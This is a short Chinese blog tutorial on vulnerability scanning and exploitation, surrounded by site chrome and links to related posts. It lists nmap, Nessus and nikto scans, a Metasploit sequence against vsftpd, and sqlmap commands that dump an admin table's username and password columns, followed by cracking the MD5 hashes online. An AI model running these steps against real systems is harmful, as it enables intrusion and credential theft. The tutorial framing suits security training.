web渗透--漏洞扫描与利用杂论

最新推荐文章于 2024-05-08 09:15:00 发布
最新推荐文章于 2024-05-08 09:15:00 发布
阅读量495 收藏
点赞数
分类专栏: 计算机网络 黑客技术分享 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MysteriousMadness/article/details/108238141
版权

一、漏洞扫描原理

    扫描器通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在的漏洞响应一致时,表明有漏洞。

二、漏洞扫描工具

    1、漏洞扫描工具--nmap

        使用nmap也可以进行漏洞扫描:

    nmap --script vuln 目标IP地址

    2、漏洞扫描工具--Nessus

三、漏洞利用--metasploit

    1、利用Metasploit对扫描到的漏洞加以利用。

    2、步骤:

        1、终端输入:msfconsole

        2、search vsftpd

        3、use exploit/unix/ftp*******

        4、set payload cmd/unix/interact

        5、show options

        6、set rhost 目标IP

        7、show options

        8、exploit

四、web漏洞扫描

    1、web漏洞扫描其实就是每个扫描器读取自己的Payload进行探测。web漏洞扫描器有:Owasp-zap、Awvs、Appscan、Nikto、burpsuite,每个扫描器都有自己独特的payload。

    2、nikto -host IP地址,主要是针对HTTP服务器

    3、漏洞利用

        1、sqlmap -u 目标网址

        2、sqlmap -u "目标网址" --tables

        3、sqlmap -u "目标网址" -T 上一步弹出来的名称 --columns

        4、sqlmap -u "目标网址" -T admin -C "admin,password" --dump

        5、在www.cmd5.com进行md5解密

 

lao_wine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
软件架构杂论
11-27
软件架构杂论,一个好的架构设计工程师应该明白
漏洞扫描利用
JJH2724719395的博客
10-07 876
flag: sS,Pn,A,oXflag:Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2flag:openflag:msfdb initflag:2008-10-28flag:use exploit/windows/smb/ms08_067_netapiflag:RHOSTSflag:Cannot reliably check exploitabilityflag:35
常见的安全扫描漏洞的工具、漏洞分类及处理
qq_41831448的博客
06-06 9037
1.1. Unix/Linux漏洞 升级相应产商的系统版本或查找对应漏洞的补丁文件1.2. OpenSSH漏洞 OpenSSH 输入验证错误漏洞(CVE-2019-16905) OpenSSH 命令注入漏洞(CVE-2020-15778) OpenSSH 安全漏洞(CVE-2021-28041) 修复建议: 一般也是升级相应的OpenSSH版本1.3Nginx漏洞 1.3.1导致拒绝服务漏洞 HTTP/2是超文本传输协议的第二版,主要用于保证客户机与服务器之间的通信。HTTP/2中存在资源管理错误漏洞。攻击
Web渗透各种漏洞原理
最新发布
weixin_51725318的博客
05-08 549
Web渗透各种漏洞原理
漏洞扫描的原理与应用
weixin_53954158的博客
07-11 1万+
漏洞扫描的原理与应用
漏洞扫描利用
helloworlddm的博客
09-20 920
声明:禁止用作非法目的,谢绝一切形式的转载。 在这里对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后,如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。 OpenVas GSM协议 NTP – Time synchronization • Connecting to 123/udp • Mandatory • Not encrypted • May use internal NTP server Feeds (see below) • Direct
利用Burp suit扫描漏洞
贝隆的博客
02-04 2530
Burp suit扫描漏洞
断验杂论
01-19
断验杂论四柱平和,不争妒。(原局四柱中和,无冲克争战,主性格随和,不与他人争锋。)年月日时在一旬,金榜题名显威,乐而忘忧。(此乃先贤口诀,六十花甲共有六旬,甲子、甲戌、甲申、甲午、甲辰、甲寅,每旬各有
1_引言&微机知识杂论.pdf
08-01
1_引言&微机知识杂论.pdf
能源杂论 安杰逻:我们怎么看新能源.pdf
09-01
能源杂论 安杰逻:我们怎么看新能源.pdf
能源杂论 太阳能、风能是环保的新能源吗.pdf
09-01
能源杂论 太阳能、风能是环保的新能源吗.pdf
两款比较全面的安全测试工具简介AWVS、OWASP
04-29
两款比较全面的安全测试工具简介AWVS、OWASP,本人根据漏洞靶场测试平台制作的工具演示教程
原型污染漏洞的扫描及利用
2301_77157449的博客
04-11 373
在这项研究中,我们的目标很简单,即扫描所有漏洞披露程序的原型污染,并找到实现 XSS 的脚本小工具。这篇技术文章将涉及我们创建的工具、面临的挑战以及整个过程中的案例研究。我们对 Web 应用程序感兴趣的两种情况是检查它是否容易受到原型污染。情况1在第一种情况下,我们要检查应用程序是否正在解析查询/哈希参数,并检查它是否在过程中污染原型。我们发现 80% 的嵌套参数解析器容易受到原型污染的影响。让我们假设 Web 应用程序使用 canjs-deparam 库来解析查询参数。
Nessus、AWVS、Appscan、OWASP漏洞扫描工具的区别(介绍、测试对象对比、优劣对比、使用选择)
qq_37776764的博客
05-16 8528
Nessus、AWVS、Appscan、OWASP漏洞扫描工具的区别(介绍、测试对象对比、优劣对比、使用选择)
【常用工具】MSF使用教程(一)漏洞扫描利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
渗透测试-完整渗透流程(二.漏洞扫描利用
qq_50643984的博客
03-08 8953
【web漏洞探测】 1.当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如: SQL注入 XSS跨站脚本 CSRF跨站请求伪造 XXE漏洞 SSRF服务端请求伪造漏洞 文件包含漏洞 文件上传漏洞 文件解析漏洞 远程代码执行漏洞 CORS跨域资源共享漏洞 越权访问漏洞 目录浏览漏洞和任意文件读取/下载漏洞 struts2漏洞 JAVA反序列化漏洞 篇幅有限这些都不赘述了 2.使用工具进行探测 AWVS Nessus AppScan Owasp-Z
渗透测试工具——漏洞扫描工具
热门推荐
weixin_59872639的博客
01-16 3万+
安全漏洞产生的原因 技术原因 软件系统复杂性提高,质量难于控制,安全性降低 公用模块的使用引发了安全问题 经济原因 “柠檬市场”效应——安全功能是最容易删减的部分 环境原因 从传统的封闭、静态和可控变为开放、动态和难控 攻易守难 安全缺陷 安全性缺陷是信息系统或产品自身“与生俱来”的特征,是其“固有成分” 安全漏洞是与生俱来的 系统设计缺陷 Internet从设计时就缺乏安全的总体架构和设计 TCP/IP中的三阶段握手. 软件源代码的急剧膨胀 Windows 95 1500万行
【网络安全】Nessus、AWVS、Appscan、OWASP漏洞扫描工具的区别(介绍、测试对象对比、优劣对比)
2301_77472496的博客
11-25 1412
Nessus、AWVS、Appscan和OWASP漏洞扫描工具都是常用的安全测试工具,它们都可以帮助安全测试人员发现Web应用程序和网络中的漏洞。
开源组件安全漏洞检测主流工具对比
jackyrongvip的专栏
11-26 922
开源组件安全漏洞检测主流工具对比_manok的专栏-CSDN博客 这个对比的确不错,收藏之。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lao_wine

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值